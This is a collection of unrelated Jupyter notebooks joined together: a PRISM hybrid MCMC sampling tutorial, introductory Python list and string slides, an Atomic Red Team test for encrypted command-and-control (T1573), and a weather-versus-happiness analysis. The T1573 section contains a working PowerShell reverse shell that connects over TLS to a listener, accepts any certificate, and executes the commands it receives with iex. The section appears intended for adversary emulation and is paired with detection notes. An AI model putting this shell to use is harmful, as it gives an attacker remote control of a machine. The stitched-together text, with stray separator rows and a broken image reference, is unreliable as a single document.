Doing so will automatically call the `get_hybrid_lnpost_fn()`-function factory using the provided *lnpost_fn* and the same input arguments given to `get_walkers()`, and return the obtained `hybrid_lnpost()`-function in addition to the starting positions of the MCMC walkers.
So, before we get into applying hybrid sampling to our model, let's use the `get_walkers()`-function to obtain all the variables we need:
```
n_walkers, p0_walkers, hybrid_lnpost = get_walkers(pipe, lnpost_fn=lnpost)
```
## Application
Now that we know how to apply hybrid sampling to our model in theory, let's see it in action.
When picking an MCMC sampling method to use, we have to keep in mind that it must allow for the starting positions of the MCMC walkers to be provided; and it must be able to use a custom log-posterior probability function.
As this is very common for most sampling methods, we will cover a few of the most popular MCMC sampling packages in Python in separate sections.
Because the emulator can be used in two different ways to speed up the parameter estimation process, we will explore three different samplers for each MCMC sampling package: *normal* (solely use normal sampling); *kick-started* (use normal sampling but start in plausible space); and *hybrid* (use normal sampling with added emulator prior).
By using these three different samplers, we can explore what the effect is of introducing an emulator to the MCMC sampling process.
So, for consistency, let's define their names here:
```
names = ["Normal", "Kick-Started", "Hybrid"]
```
Before continuing, please make sure that the appropriate package is installed before going to the related section.
Also, if you would like to see an example of a different sampling package in here, please open a [GitHub issue](https://github.com/1313e/PRISM/issues) about it (keep in mind that all requested packages must be `pip`-installable).
### emcee
Probably one of the most popular MCMC sampling packages in Python for quite some time now, is the [*emcee*](https://emcee.readthedocs.io/en/latest/) package.
For that reason, it would be weird to not include it here.
So, let's import the required definitions and see how we can use *emcee* to do hybrid sampling (we also call `get_walkers()` again to make sure any changes made previously are overridden):
```
from emcee import EnsembleSampler
n_walkers, p0_walkers, hybrid_lnpost = get_walkers(pipe, lnpost_fn=lnpost)
```
Now that we have the required class for doing the sampling, we can set up the three different samples.
As the `EnsembleSampler` requires that the number of MCMC walkers is even, we will also have to make sure that this is the case (by duplicating all walkers if it is not):
```
# Duplicate all MCMC walkers if n_walkers is odd
if n_walkers % 2:
n_walkers *= 2
p0_walkers = np.concatenate([p0_walkers]*2)
# Generate some initial positions for the normal sampler
p0_walkers_n = lhd(n_sam=n_walkers,
n_val=modellink_obj._n_par,
val_rng=modellink_obj._par_rng)
# Create empty dict to hold the samplers
samplers = {}
# Define the three different samplers
# Add their initial positions and their initial model call counter
# Normal sampler
samplers[names[0]] = [p0_walkers_n, 0,
EnsembleSampler(nwalkers=n_walkers,
dim=modellink_obj._n_par,
lnpostfn=lnpost)]
# Kick-started sampler
samplers[names[1]] = [p0_walkers, sum(pipe.emulator.n_sam[1:]),
EnsembleSampler(nwalkers=n_walkers,
dim=modellink_obj._n_par,
lnpostfn=lnpost)]
# Hybrid sampler
samplers[names[2]] = [p0_walkers, sum(pipe.emulator.n_sam[1:]),
EnsembleSampler(nwalkers=n_walkers,
dim=modellink_obj._n_par,
lnpostfn=hybrid_lnpost)]
```
In the declaration of the three different entries for the `samplers` dict, we can easily see what the differences are between the samplers.
But, everything is now ready to do some (hybrid) sampling:
```
# Define number of MCMC iterations
n_iter = 50
# Loop over all samplers
for name, (p0, call_counter, sampler) in samplers.items():
# Run the sampler for n_iter iterations
sampler.run_mcmc(p0, n_iter)
# Make sure to save current values of p0 and call_counter for reruns
samplers[name][0] = sampler.chain[:, -1]
samplers[name][1] = call_counter
# Create a corner plot showing the results
fig = corner(xs=sampler.flatchain,
labels=modellink_obj._par_name,
show_titles=True,
truths=modellink_obj._par_est)
fig.suptitle("%s: $%s$ iterations, $%s$ evaluations, $%s$%% acceptance"
% (name, f2tex(sampler.iterations), f2tex(call_counter),
f2tex(np.average(sampler.acceptance_fraction*100))),
y=0.025)
plt.show()
```
From these three corner plots, we can learn a few things.
First of all, we can see that the parameter estimation accuracy of the normal sampler (first plot) is noticeably lower than that of the other two.
However, it also used less model evaluations (as shown by the title at the bottom of each plot).
The reason for this is that we added the initial number of model evaluations required for constructing the emulator as well, which is:
```
sum(pipe.emulator.n_sam[1:])
```
If we take this into account, then we see that the number of model evaluations used during the sampling process, is very similar for all three.
However, if we were to run the normal sampler for another *n_iter* iterations, this might change:
```
# Get variables for normal sampler
name = names[0]
p0, call_counter, sampler = samplers[name]
# Run the sampler for n_iter iterations
sampler.run_mcmc(p0, n_iter)
# Make sure to save current values of p0 and call_counter for reruns
samplers[name][0] = sampler.chain[:, -1]
samplers[name][1] = call_counter
# Create a corner plot showing the results
fig = corner(xs=sampler.flatchain,
labels=modellink_obj._par_name,
show_titles=True,
truths=modellink_obj._par_est)
fig.suptitle("%s: $%s$ iterations, $%s$ evaluations, $%s$%% acceptance"
% (name, f2tex(sampler.iterations), f2tex(call_counter),
f2tex(np.average(sampler.acceptance_fraction*100))),
y=0.025)
plt.show()
```
We can see here that the normal sampler has still not reached the same accuracy as the kick-started and hybrid samplers, even though now it used more model evaluations.
This shows how much of an impact skipping the burn-in phase has on the convergence speed of the sampling process, even when using a simple model like our single Gaussian.
Something that we can also note is that the kick-started and hybrid samplers have very, very similar results and accuracies.
This, again, shows the impact of skipping the burn-in phase.
However, it does seem that the hybrid sampler used less evaluations than the kick-started sampler, which is a result of the emulator steering the first into the right direction.
The effect for this simple model is very minor though, but can easily become much more important for more complex models.
### dynesty
Coming soon...
|
github_jupyter
|
# Imports
from corner import corner
from e13tools.pyplot import f2tex
from e13tools.sampling import lhd
import matplotlib.pyplot as plt
import numpy as np
from prism import Pipeline
from prism.modellink import GaussianLink
from prism.utils import get_hybrid_lnpost_fn, get_walkers
# Emulator construction
# Set required emulator iteration
emul_i = 2
# Create GaussianLink object
model_data = {3: [3.0, 0.1], # f(3) = 3.0 +- 0.1
5: [5.0, 0.1], # f(5) = 5.0 +- 0.1
7: [3.0, 0.1]} # f(7) = 3.0 +- 0.1
modellink_obj = GaussianLink(model_data=model_data)
# Initialize Pipeline
pipe = Pipeline(modellink_obj, working_dir='prism_hybrid')
# Construct required iterations
for i in range(pipe.emulator.emul_i+1, emul_i+1):
# For reproducibility, set the NumPy random seed for each iteration
np.random.seed(1313*i)
# Use analyze=False to use different impl_cuts for different iterations
pipe.construct(i, analyze=False)
# Use different analysis settings for iteration 2
if(i == 2):
pipe.base_eval_sam = 8000
pipe.impl_cut = [4.0, 3.8, 3.6]
# Analyze iteration
pipe.analyze()
# Set NumPy random seed to something random
np.random.seed()
# Use impl_sam if it is available (default)
n_walkers, p0_walkers = get_walkers(pipe)
print("Number of plausible starting positions (default) : %i" % (n_walkers))
# Propose 10000 starting positions
init_walkers = 10000
n_walkers, p0_walkers = get_walkers(pipe, init_walkers=init_walkers)
print("Number of plausible starting positions (integer) : %i" % (n_walkers))
# Propose custom set of 10000 starting positions
init_walkers = lhd(10000, modellink_obj._n_par, modellink_obj._par_rng)
n_walkers, p0_walkers = get_walkers(pipe, init_walkers=init_walkers)
print("Number of plausible starting positions (custom) : %i" % (n_walkers), flush=True)
# Request at least 1000 plausible starting positions (requires v1.1.4 or later)
n_walkers, p0_walkers = get_walkers(pipe, req_n_walkers=1000)
print("Number of plausible starting positions (specific): %i" % (n_walkers))
# Pre-calculate the data variance. Assume data_err is centered
data_var = np.array([err[0]**2 for err in modellink_obj._data_err])
# Add a global counter to measure the number of times the model is called
global call_counter
call_counter = 0
# Define lnpost
def lnpost(par_set):
# Check if par_set is within parameter space and return -infty if not
# Note that this is not needed if we solely use lnpost for hybrid sampling
par_rng = modellink_obj._par_rng
if not ((par_rng[:, 0] <= par_set)*(par_set <= par_rng[:, 1])).all():
return(-np.infty)
# Increment call_counter by one
global call_counter
call_counter += 1
# Convert par_set to par_dict
par_dict = dict(zip(modellink_obj._par_name, par_set))
# Evaluate model at requested parameter set
mod_out = modellink_obj.call_model(emul_i, par_dict,
modellink_obj._data_idx)
# Get model and total variances
md_var = modellink_obj.get_md_var(emul_i, par_dict,
modellink_obj._data_idx)
tot_var = md_var+data_var
# Calculate the posterior probability
return(-0.5*(np.sum((modellink_obj._data_val-mod_out)**2/tot_var)))
hybrid_lnpost = get_hybrid_lnpost_fn(lnpost, pipe)
# Define a sample
par_set = [1, 1, 1]
# Evaluate it in the pipeline to check if it is plausible
pipe.evaluate(par_set)
# Evaluate this sample in both lnpost and hybrid_lnpost
print()
print(" lnpost(%s) = %s" % (par_set, lnpost(par_set)))
print("hybrid_lnpost(%s) = %s" % (par_set, hybrid_lnpost(par_set)))
n_walkers, p0_walkers, hybrid_lnpost = get_walkers(pipe, lnpost_fn=lnpost)
names = ["Normal", "Kick-Started", "Hybrid"]
from emcee import EnsembleSampler
n_walkers, p0_walkers, hybrid_lnpost = get_walkers(pipe, lnpost_fn=lnpost)
# Duplicate all MCMC walkers if n_walkers is odd
if n_walkers % 2:
n_walkers *= 2
p0_walkers = np.concatenate([p0_walkers]*2)
# Generate some initial positions for the normal sampler
p0_walkers_n = lhd(n_sam=n_walkers,
n_val=modellink_obj._n_par,
val_rng=modellink_obj._par_rng)
# Create empty dict to hold the samplers
samplers = {}
# Define the three different samplers
# Add their initial positions and their initial model call counter
# Normal sampler
samplers[names[0]] = [p0_walkers_n, 0,
EnsembleSampler(nwalkers=n_walkers,
dim=modellink_obj._n_par,
lnpostfn=lnpost)]
# Kick-started sampler
samplers[names[1]] = [p0_walkers, sum(pipe.emulator.n_sam[1:]),
EnsembleSampler(nwalkers=n_walkers,
dim=modellink_obj._n_par,
lnpostfn=lnpost)]
# Hybrid sampler
samplers[names[2]] = [p0_walkers, sum(pipe.emulator.n_sam[1:]),
EnsembleSampler(nwalkers=n_walkers,
dim=modellink_obj._n_par,
lnpostfn=hybrid_lnpost)]
# Define number of MCMC iterations
n_iter = 50
# Loop over all samplers
for name, (p0, call_counter, sampler) in samplers.items():
# Run the sampler for n_iter iterations
sampler.run_mcmc(p0, n_iter)
# Make sure to save current values of p0 and call_counter for reruns
samplers[name][0] = sampler.chain[:, -1]
samplers[name][1] = call_counter
# Create a corner plot showing the results
fig = corner(xs=sampler.flatchain,
labels=modellink_obj._par_name,
show_titles=True,
truths=modellink_obj._par_est)
fig.suptitle("%s: $%s$ iterations, $%s$ evaluations, $%s$%% acceptance"
% (name, f2tex(sampler.iterations), f2tex(call_counter),
f2tex(np.average(sampler.acceptance_fraction*100))),
y=0.025)
plt.show()
sum(pipe.emulator.n_sam[1:])
# Get variables for normal sampler
name = names[0]
p0, call_counter, sampler = samplers[name]
# Run the sampler for n_iter iterations
sampler.run_mcmc(p0, n_iter)
# Make sure to save current values of p0 and call_counter for reruns
samplers[name][0] = sampler.chain[:, -1]
samplers[name][1] = call_counter
# Create a corner plot showing the results
fig = corner(xs=sampler.flatchain,
labels=modellink_obj._par_name,
show_titles=True,
truths=modellink_obj._par_est)
fig.suptitle("%s: $%s$ iterations, $%s$ evaluations, $%s$%% acceptance"
% (name, f2tex(sampler.iterations), f2tex(call_counter),
f2tex(np.average(sampler.acceptance_fraction*100))),
y=0.025)
plt.show()
| 0.697712 | 0.989129 |
# Beginning Programming in Python
### Lists/Strings
#### CSE20 - Spring 2021
Interactive Slides: [https://tinyurl.com/cse20-spr21-lists-strings](https://tinyurl.com/cse20-spr21-lists-strings)
# Lists
- Commonly in programming we want to keep a collection of values rather than a single value.
- In Python, one way this can be done is by using `list`s
- A `list` can store between 0 and 9,223,372,036,854,775,807 items(though a list that large would probably crash your computer).
- A `list` can store different types in its list.
- A `list` is a **mutable** collection, meaning we can change the contents of the list
- Typical naming convention for `list` variables is to name them in the plural, i.e. `items`, `values`, or `cars`
# Lists: Instantiation (Creation)
- There are a few ways to instantiate a list. The way we'll go over today is using square brackets `[]`
```
some_numbers = [1, 2, 3, 4]
some_letters = ["a", "b", "c"]
some_numbers_and_letters = [1, "b", 3]
empty_list = []
```
# Lists: Access
- To access/retrieve the values stored in a `list` variable we use square brackets `[]`
- To retrieve a single value we use an index (starting from the left 0, or from the right with -1), i.e. `list_variable[0]`
- To retrieve multiple items we use a `slice`. A `slice` is denoted using a colon `:`, and bounding indices can be placed on either side of the colon. Indices in `slice` notation are on a half closed interval where `list_variable[start:end]` operates on the interval `[start, end)`
- The contents of a list can be changed by assigning a new value at a index. `list_variable[idx] = new_value`
# Lists: Access
```
some_values = [1, "b", 3, "d"]
print(some_values[0])
print(some_values[-1])
print(some_values[1:])
print(some_values[:2])
print(some_values[1:3])
print(some_values[:])
```
# Lists: Updates
```
some_values = [1, "b", 3, "d"]
print(some_values)
some_values[0] = "a"
print(some_values)
some_values[0:2] = [1, 2]
print(some_values)
```
# `list` Methods
- `list`'s are considered `object`s, we'll go over `object`s in more detail when we go over Object Oriented Programming (OOP).
- For now you need to know that objects can have functions called `methods`, which can be "called" by using the `list_variable.method_name()` notation.
# `list` Methods: `append()`
- `append()` adds a value to the end of the `list`
```
some_values = []
some_values.append("Howdy")
print(some_values)
some_values.append("There")
print(some_values)
some_values.append("Friend")
print(some_values)
```
# `list` Methods: `pop()`
- `pop()` removes a value from the end of the `list`
```
some_values = ["Howdy", "There", "Friend"]
print(some_values)
last_item = some_values.pop()
print("some_values: ", some_values)
print("last_item: ", last_item)
```
# `list` Methods: `remove()`
- `remove()` removes the first value in the `list` that matches the given argument
```
some_values = ["Howdy", "There", "Friend"]
print(some_values)
some_values.remove("There")
print("some_values: ", some_values)
```
# `list` Methods: `index()`
- `index()` returns the "index" you would need to use to get the get the given argument.
```
some_values = ["Howdy", "There", "Friend"]
print(some_values)
there_idx = some_values.index("Friend")
print("there_idx: ", there_idx)
print("some_values[there_idx]: ", some_values[there_idx])
```
# `list` Methods: `count()`
- `count()` returns the number of times a given argument occurs in a `list`
```
some_values = ["Howdy", "There", "Friend"]
print("Howdy occurs", some_values.count("Howdy"), "time(s)")
some_values.append("Howdy")
print("Howdy occurs", some_values.count("Howdy"), "time(s)")
print(some_values)
```
# `list` Methods: `reverse()`
- `reverse()` reverses the order of the elements in the list
```
some_values = ["Howdy", "There", "Friend", "Hello"]
print("some_values: ", some_values)
some_values.reverse()
print("some_values: ", some_values)
```
# `list` Methods: `extend()` or `+`
- `+` like with strings will concatenate two lists together
- `extend()` concatenates two lists, but does it "in-place". Its like using `+=` for concatenation.
```
some_values = ["Howdy", "There", "Friend"]
other_values = ["How", "Are", "You"]
concat = other_values + some_values
print(concat)
some_values.extend(other_values)
print(some_values)
some_values.extend(other_values)
print(some_values)
```
# Built-in Functions That are Compatible With `list`s
- `len()` will return the length(number of elements in) of the `list`
- `max()` will return the maximum element in the list
- `min()` will return the minimum element in the list
- `sum()` will return the sum of all the elements in the list
# Built-in Functions That are Compatible With `list`s
```
some_values = [1, 2, 3, 4, 5]
print(some_values)
print("There are", len(some_values), "values in the list")
print("The largest value is", max(some_values))
print("The smallest value is", min(some_values))
print("The sum of the values in the list is", sum(some_values))
```
# Strings
- Strings are like a list of characters but are different in a couple important ways:
- They are **immutable** (can't be changed)
- They don't support methods that imply mutability like `pop()`, `extend()`, `reverse()`, etc.
- Some helpful methods not apart of list include `.lower()` and `.upper()`
- `split()` can break a string into a list of strings, splitting the string based on the input argument
- More info in the string [documentation](https://docs.python.org/3/library/stdtypes.html#string-methods)
# Strings
```
class_name = "CSE20E40EABCjdfhsjkdfhkdjsfhskdjfhksjdhfkjlsdahf"
print(class_name[0])
print(class_name.index("E"))
print(class_name.count("2"))
print(class_name.lower())
print(class_name.split("h"))
```
# Membership Operator `in` `not in`
- You can test whether or not a `list` or string contains a value by using `in` and `not in`
```
some_numbers = [1, 2, 3]
contains_one = 4 in some_numbers
print(contains_one)
class_name = "CSE20"
contains_cse = "C20" in class_name
print(contains_cse)
```
# What's Due Next?
- zybooks Chapter 3 due April 18th 11:59 PM
- Assignment 2 due April 25th 11:59 PM
|
github_jupyter
|
some_numbers = [1, 2, 3, 4]
some_letters = ["a", "b", "c"]
some_numbers_and_letters = [1, "b", 3]
empty_list = []
some_values = [1, "b", 3, "d"]
print(some_values[0])
print(some_values[-1])
print(some_values[1:])
print(some_values[:2])
print(some_values[1:3])
print(some_values[:])
some_values = [1, "b", 3, "d"]
print(some_values)
some_values[0] = "a"
print(some_values)
some_values[0:2] = [1, 2]
print(some_values)
some_values = []
some_values.append("Howdy")
print(some_values)
some_values.append("There")
print(some_values)
some_values.append("Friend")
print(some_values)
some_values = ["Howdy", "There", "Friend"]
print(some_values)
last_item = some_values.pop()
print("some_values: ", some_values)
print("last_item: ", last_item)
some_values = ["Howdy", "There", "Friend"]
print(some_values)
some_values.remove("There")
print("some_values: ", some_values)
some_values = ["Howdy", "There", "Friend"]
print(some_values)
there_idx = some_values.index("Friend")
print("there_idx: ", there_idx)
print("some_values[there_idx]: ", some_values[there_idx])
some_values = ["Howdy", "There", "Friend"]
print("Howdy occurs", some_values.count("Howdy"), "time(s)")
some_values.append("Howdy")
print("Howdy occurs", some_values.count("Howdy"), "time(s)")
print(some_values)
some_values = ["Howdy", "There", "Friend", "Hello"]
print("some_values: ", some_values)
some_values.reverse()
print("some_values: ", some_values)
some_values = ["Howdy", "There", "Friend"]
other_values = ["How", "Are", "You"]
concat = other_values + some_values
print(concat)
some_values.extend(other_values)
print(some_values)
some_values.extend(other_values)
print(some_values)
some_values = [1, 2, 3, 4, 5]
print(some_values)
print("There are", len(some_values), "values in the list")
print("The largest value is", max(some_values))
print("The smallest value is", min(some_values))
print("The sum of the values in the list is", sum(some_values))
class_name = "CSE20E40EABCjdfhsjkdfhkdjsfhskdjfhksjdhfkjlsdahf"
print(class_name[0])
print(class_name.index("E"))
print(class_name.count("2"))
print(class_name.lower())
print(class_name.split("h"))
some_numbers = [1, 2, 3]
contains_one = 4 in some_numbers
print(contains_one)
class_name = "CSE20"
contains_cse = "C20" in class_name
print(contains_cse)
| 0.163479 | 0.964221 |
# T1573 - Encrypted Channel
Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
## Atomic Tests
```
#Import the Module before running the tests.
# Checkout Jupyter Notebook at https://github.com/cyb3rbuff/TheAtomicPlaybook to run PS scripts.
Import-Module /Users/0x6c/AtomicRedTeam/atomics/invoke-atomicredteam/Invoke-AtomicRedTeam.psd1 - Force
```
### Atomic Test #1 - OpenSSL C2
Thanks to @OrOneEqualsOne for this quick C2 method.
This is to test to see if a C2 session can be established using an SSL socket.
More information about this technique, including how to set up the listener, can be found here:
https://medium.com/walmartlabs/openssl-server-reverse-shell-from-windows-client-aee2dbfa0926
Upon successful execution, powershell will make a network connection to 127.0.0.1 over 443.
**Supported Platforms:** windows
#### Attack Commands: Run with `powershell`
```powershell
$server_ip = 127.0.0.1
$server_port = 443
$socket = New-Object Net.Sockets.TcpClient('127.0.0.1', '443')
$stream = $socket.GetStream()
$sslStream = New-Object System.Net.Security.SslStream($stream,$false,({$True} -as [Net.Security.RemoteCertificateValidationCallback]))
$sslStream.AuthenticateAsClient('fake.domain', $null, "Tls12", $false)
$writer = new-object System.IO.StreamWriter($sslStream)
$writer.Write('PS ' + (pwd).Path + '> ')
$writer.flush()
[byte[]]$bytes = 0..65535|%{0};
while(($i = $sslStream.Read($bytes, 0, $bytes.Length)) -ne 0)
{$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);
$sendback = (iex $data | Out-String ) 2>&1;
$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';
$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);
$sslStream.Write($sendbyte,0,$sendbyte.Length);$sslStream.Flush()}
```
```
Invoke-AtomicTest T1573 -TestNumbers 1
```
## Detection
SSL/TLS inspection is one way of detecting command and control traffic within some encrypted communication channels.(Citation: SANS Decrypting SSL) SSL/TLS inspection does come with certain risks that should be considered before implementing to avoid potential security issues such as incomplete certificate validation.(Citation: SEI SSL Inspection Risks)
In general, analyze network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server). Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious. Analyze packet contents to detect communications that do not follow the expected protocol behavior for the port that is being used.(Citation: University of Birmingham C2)
## Shield Active Defense
### Protocol Decoder
Use software designed to deobfuscate or decrypt adversary command and control (C2) or data exfiltration traffic.
Protocol decoders are designed to read network traffic and contextualize all activity between the operator and the implant. These tools are often required to process complex encryption ciphers and custom protocols into a human-readable format for an analyst to interpret.
#### Opportunity
There is an opportunity to reveal data that the adversary has tried to protect from defenders
#### Use Case
Defenders can reverse engineer malware and develop protocol decoders that can decrypt and expose adversary communications
#### Procedures
Create and apply a decoder which allows you to view encrypted and/or encoded network traffic in a human-readable format.
|
github_jupyter
|
#Import the Module before running the tests.
# Checkout Jupyter Notebook at https://github.com/cyb3rbuff/TheAtomicPlaybook to run PS scripts.
Import-Module /Users/0x6c/AtomicRedTeam/atomics/invoke-atomicredteam/Invoke-AtomicRedTeam.psd1 - Force
$server_ip = 127.0.0.1
$server_port = 443
$socket = New-Object Net.Sockets.TcpClient('127.0.0.1', '443')
$stream = $socket.GetStream()
$sslStream = New-Object System.Net.Security.SslStream($stream,$false,({$True} -as [Net.Security.RemoteCertificateValidationCallback]))
$sslStream.AuthenticateAsClient('fake.domain', $null, "Tls12", $false)
$writer = new-object System.IO.StreamWriter($sslStream)
$writer.Write('PS ' + (pwd).Path + '> ')
$writer.flush()
[byte[]]$bytes = 0..65535|%{0};
while(($i = $sslStream.Read($bytes, 0, $bytes.Length)) -ne 0)
{$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);
$sendback = (iex $data | Out-String ) 2>&1;
$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';
$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);
$sslStream.Write($sendbyte,0,$sendbyte.Length);$sslStream.Flush()}
Invoke-AtomicTest T1573 -TestNumbers 1
| 0.392104 | 0.797911 |
# Weather and happiness
## Introduction
Using data from the 2020 world happiness report (retrieved from Wikipedia) as well as weather data from the OXCOVID-19 database, I look to answer the question โhow does weather, as measured by average temperature, impact a countryโs happiness index?โ
The effect of weather on happiness has received considerable study both at micro and macro levels. At a micro level research by Tsutsui (2013) on the happiness level of 75 students at Osaka university over a time period of 516 days found a quadratic relationship between happiness and temperature with happiness maximised at 13.98 C. This study is supported by similar findings that lower temperatures correlate with higher levels of wellbeing (and vice versa, assessed over summer) and that women are much more responsive than men to the weather (Connolly, 2013). Using data disaggregated at a local and individual level Brereton et al (2007) find that windspeed has a negative and significant correlation to personal wellbeing.
Larger studies include Rehdanza and Maddison (2005) who analyse the effects of climate on happiness across 67 countries, controlling for relevant socio-economic factors such as GDP per capita, and finding that in warmer seasons people prefer colder average temperatures whilst in colder seasons people prefer warmer average temperatures. This alludes to the element of variation in temperature playing a notable role in determining happiness.
The rational supporting the use of the 2020 โWorld happiness reportโ (Helliwell, Layard, Sachs, & Neve, 2020) is that at the time of writing this was the most recent and comprehensive data set on โhappinessโ at a global level. This data is accessed via the Wikipedia page titled โWorld Happiness Reportโ (Wikipedia, 2020) due to the ease of use in accessing the data (via Wikipedia API rather than โcopy/pastingโ data from the world happiness report pdf file) and as the page is classified with โPending Changes Protectionโ it ensures that the data contained within has protections to ensure it's accuracy (i.e. there are some checks and balances before the data is changed). The index is calculated through a globally administered survey which asks respondents to rate their lives on a scale of 1 to 10 (10 being the best) and then averages this across the country (Wikipedia, 2020) (limitations of 'measuring' happiness are discussed further below).
The timeframe analysed is from January 01 to October 31 for the weather data from the OXCOVID-19 database whilst the world happiness report 2020 gives an average of the happiness index for every country averaged over the years 2017 โ 2019. The key assumption that justifies this choice of data despite the temporal differences is that the weather has been relatively constant between 2019 and 2020. In addition to this, the COVID-19 pandemic has heavily impacted peopleโs happiness at a global level, therefore it can be argued that last years happiness level indicator would be the best estimate for this yearโs happiness index in lieu of the effect of COVID-19.
As this analysis is focused on happiness at a global level weather is considered at a country level. To account for the large variation in weather present in very large countries, the analysis is limited to countries with a land area less than 450,000 km^2. This allows for ~75% of the countries in the world to be considered.
```
try:
import seaborn as sns
if sns.__version__ == "0.11.0":
pass
else:
import sys
!{sys.executable} -m pip install --upgrade seaborn==0.11.0
except ModuleNotFoundError:
import sys
!{sys.executable} -m pip install seaborn==0.11.0
import seaborn as sns
print(sns.__version__ == "0.11.0")
import psycopg2
import matplotlib.pyplot as plt
import matplotlib.dates as mdates
from matplotlib.dates import DateFormatter
import matplotlib as mpl
#mpl.rcParams['figure.dpi'] = 200
import seaborn as sns
import numpy as np
import pandas as pd
import math
import datetime
from bs4 import BeautifulSoup
# Wikipedia API
import wikipedia
#wikipedia.set_lang("en")
# Load in happiness data
happiness_index_wikiObj = wikipedia.page("World Happiness Report", preload=True) #preload=True
happiness_index_html = happiness_index_wikiObj.html()
soup = BeautifulSoup(happiness_index_html, 'html.parser')
Happiness_index_2020_soup = soup.find('table',{'class':"wikitable"})
df_Happiness_2020 = pd.read_html(str(Happiness_index_2020_soup))
df_Happiness_2020 = pd.DataFrame(df_Happiness_2020[0])
# Load in weather data
conn = psycopg2.connect(
host='covid19db.org',
port=5432,
dbname='covid19',
user='covid19',
password='******')
cur = conn.cursor()
sql_command_1 = """SELECT date, country, countrycode, AVG(temperature_mean_avg) AS temperature_mean_avg
, AVG(sunshine_mean_avg) AS sunshine_mean_avg
FROM weather
WHERE date > '2019-12-31' AND date<'2020-11-01'
AND source= 'MET'
GROUP BY date, country, countrycode
"""
sql_command_2 = """ SELECT countrycode,value
FROM world_bank
WHERE indicator_name = 'Land area (sq. km)'
AND value<450000 AND year > 1960 """
df_weather = pd.read_sql(sql_command_1, conn)
df_LandSizes = pd.read_sql(sql_command_2, conn)
conn.close()
# Limit to countries with a landsize less than 450,000 (~75% of countries in the world)
df_weather = df_weather.merge(df_LandSizes,
how='inner',
on='countrycode')
assert df_weather.isna().sum().sum() == 0, "Null values present"
# Convert units date, Temperature Kelvin to Celius
df_weather['date'] = pd.to_datetime(df_weather['date'],format='%Y-%m-%d')
df_weather['temperature_mean_avg_C'] = df_weather['temperature_mean_avg'].apply(lambda x: x-274.15)
df_weather_avg = df_weather[['date', 'countrycode', 'country', 'temperature_mean_avg_C']].groupby(['country']).mean()
df_weather_happy_country = df_Happiness_2020[['Score','Overall rank', 'Country or region']].merge(df_weather_avg
, how='inner'
, left_on='Country or region'
, right_on = 'country')
# Function to plot scatter plot of happiness vs temperature with line of best fit
def happiness_temperature_scatter(df):
sns.set_theme(style="whitegrid")
fig, ax1 = plt.subplots()
fig.set_dpi(150)
df.sort_values("temperature_mean_avg_C", inplace=True)
y=df["Score"]
x=df["temperature_mean_avg_C"]
g = ax1.scatter(x, y, c=x, cmap='Spectral_r')
ax1.scatter(x, y, c=x, cmap='Spectral_r')
ax1.set_title('Figure 1: Average temperature and happiness score')
ax1.set_ylabel('Country happiness score')
fig.colorbar(g,orientation='horizontal',pad=0.02,ticks=ax1.get_xticks(),anchor=(0,0), panchor=(0.1,0)
,spacing='uniform',extendfrac='auto',fraction=0.07, label = 'Average Temperature (Degrees Celcius)')
ax1.set_xlabel(None)
ax1.set_xticklabels([None])
model2 = np.poly1d(np.polyfit(x, y, 1))
ax1.plot(x, model2(x))
df_weather['month'] = df_weather['date'].apply(lambda x: x.month_name())
df_weather_avg_2 = df_weather[['date', 'country', 'temperature_mean_avg_C','month']].groupby(['country','month']).mean()
df_weather_happy_country_month = df_Happiness_2020[['Score','Overall rank', 'Country or region']].merge(df_weather_avg_2
, how='inner'
, left_on='Country or region'
, right_on = 'country')
top10_Countries = df_weather_happy_country_month.sort_values(by='Overall rank', ascending= True)[:100]
bottom10_Countries = df_weather_happy_country_month.sort_values('Overall rank', ascending= True)[-100:]
# Function to plot boxplot of 10 countries with the variation in weather
def happiness_tempvar_Hboxplot(df,plot_title):
sns.set_theme(style="ticks")
fig, ax1 = plt.subplots()
fig.set_dpi(150)
#fig.set_size_inches(3,2)
sns.boxplot(data=df, x="temperature_mean_avg_C", y="Country or region"
, whis=[0, 100], width=.7, palette="vlag")
sns.stripplot(data=df, x="temperature_mean_avg_C", y="Country or region"
, size=4, color=".3", linewidth=0)
ax1.xaxis.grid(True)
ax1.set(ylabel="Countries ordered by \n happiness score (Descending)")
ax1.set_title(plot_title)
ax1.set_xlabel("Average temperature (Degrees Celcius)")
#print(dir(ax))
sns.despine(trim=False, left=False)
df_weather_happy_country['temp_range'] = df_weather_happy_country['temperature_mean_avg_C'].apply(lambda x: "less than 15 degrees celcius" if x<15
else
"Greater than 20 degrees celcius" if x>20
else "15 - 20 degrees celcius" )
# Function to plot scatter graph of average temperature and happiness divided between three temperature ranges
def hapiness_temp_3plots(df):
graph = sns.FacetGrid(df, col ='temp_range',legend_out=True,sharex=False)
graph.map(sns.regplot, "temperature_mean_avg_C", "Score").add_legend()
graph.fig.set_size_inches(15,5)
graph.fig.set_constrained_layout_pads(w_pad = 0.001, h_pad = 5.0/70.0 ,
hspace = 0.7, wspace = 0.7)
graph.set_xlabels("Average temperature (Degrees Celcius)")
graph.set_ylabels("Happiness index")
graph.fig.set_dpi(300)
plt.show()
#hapiness_temp_3plots(df_weather_happy_country)
```
## Discussion
```
happiness_temperature_scatter(df_weather_happy_country)
```
The first section of analysis concerns the relationship between temperature and weather as shown by figure 1. Within this graph, โaverage temperatureโ is calculated as an average of the average daily temperature, segmented by country, from January to October. The graph shows a relatively strong negative relationship between the average temperature in a country and the countries happiness score. This relationship is in line with research indicating that people tend to be happier in countries with relatively colder weather however it does not suggest a quadratic relationship between weather and happiness maximized at 13 C as found by Tsutsui (2013). A possible reason for this is that the research by Tsutsui was focused on happiness and weather at a local micro level whereas this research has a global macro focus.
A limitation of this analysis is that it does not consider the vast seasonal changes in temperature which are experienced by countries which experience the four seasons of spring, summer, autumn and winter. The following two charts take this into account showing the yearly variation in weather for the top 10 happiest and least happiest countries.
```
happiness_tempvar_Hboxplot(top10_Countries,"Fig 2.1: Temperature range of top 10 happiest countries")
```
